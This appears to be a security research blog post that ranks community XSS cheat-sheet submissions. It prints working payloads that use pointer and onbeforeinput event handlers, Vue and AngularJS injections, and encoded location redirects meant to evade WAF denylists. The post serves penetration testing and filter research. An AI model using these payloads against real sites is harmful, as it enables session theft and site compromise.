Published: 03 October 2022 at 14:28 UTC
Updated: 03 October 2022 at 14:28 UTC
Since we launched the ever popular XSS cheat sheet, we've had some fantastic contributions from the XSS community. In this post, we thought we'd take the opportunity to highlight the seven best community submissions that we think stand out from the rest.
At number seven is a whole range of missing events, submitted by @hahwul:
<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>
View this entry on the XSS cheat sheet
In the sixth position is a Vue based vector entry, from @p4fg - this one uses the v-if attribute to save a few bytes:
<x v-if=_c.constructor('alert(1)')()>
View this entry on the XSS cheat sheet
In at number five, this entry is a nice short vector from @NotSoSecure that may help when you have a character restriction limit with an AngularJS injection:
<input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
View this entry on the XSS cheat sheet
The entry at number four entry is a vector from @kachakil - they add a missing vector from our AngularJS research, and fix it so that it works in other contexts:
{y:''.constructor.prototype}.y.charAt=[].join;[1]|orderBy:'x=alert(1)'
View this entry on the XSS cheat sheet
An unexpected entry at number three! We like this submission from @davwwwx because it injects into an HTML attribute that doesn't support Vue template expressions - it's very reminiscent of our AngularJS sandbox bypass.
<p slot-scope="){}}])+this.constructor.constructor('alert(1)')()})};//">
View this entry on the XSS cheat sheet
The penultimate entry is from @laytonctf, who spotted a new relatively unknown event onbeforeinput. Guaranteed to bypass a denylist - or "blacklist" - of known bad events, many WAFs block on* but for those who don't:
<input onbeforeinput=alert(1)>
View this entry on the XSS cheat sheet
Claiming the top spot, and for good reason, we consider this the best entry that we wanted to highlight. It's from @ladecruze, and uses the location object, base64 decoding, and tagged template strings to execute the payload. It's a nice way to conceal a payload that should bypass a WAF that doesn't detect backticks:
<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>
If backticks are detected, then you could probably bypass a dumb WAF using the grave entity:
<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>
View this entry on the XSS cheat sheet
We couldn't resist finding variants on @ladecruze's submission, using unescape/decodeURI/decodeURIComponent/String.fromCharCode/String.fromCodePoint. Can you find any more? Share them with us on @PortSwiggerRes if you do...
<img/src/onerror=location=unescape`%u006a%u0061%u0076%u0061%u0073%u0063%u0072%u0069%u0070%u0074%u003a%u0061%u006c%u0065%u0072%u0074%u0028%u0064%u006f%u0063%u0075%u006d%u0065%u006e%u0074%u002e%u0064%u006f%u006d%u0061%u0069%u006e%u0029`>
<img/src/onerror=location=String.fromCodePoint.call`${106}${97}${118}${97}${115}${99}${114}${105}${112}${116}${58}${97}${108}${101}${114}${116}${40}${49}${41}`>
We hope you liked the submissions from the XSS community. If you think you've got a vector worthy of adding to the XSS cheat sheet, you can submit a pull request and if it's good enough, we'll add it with credit.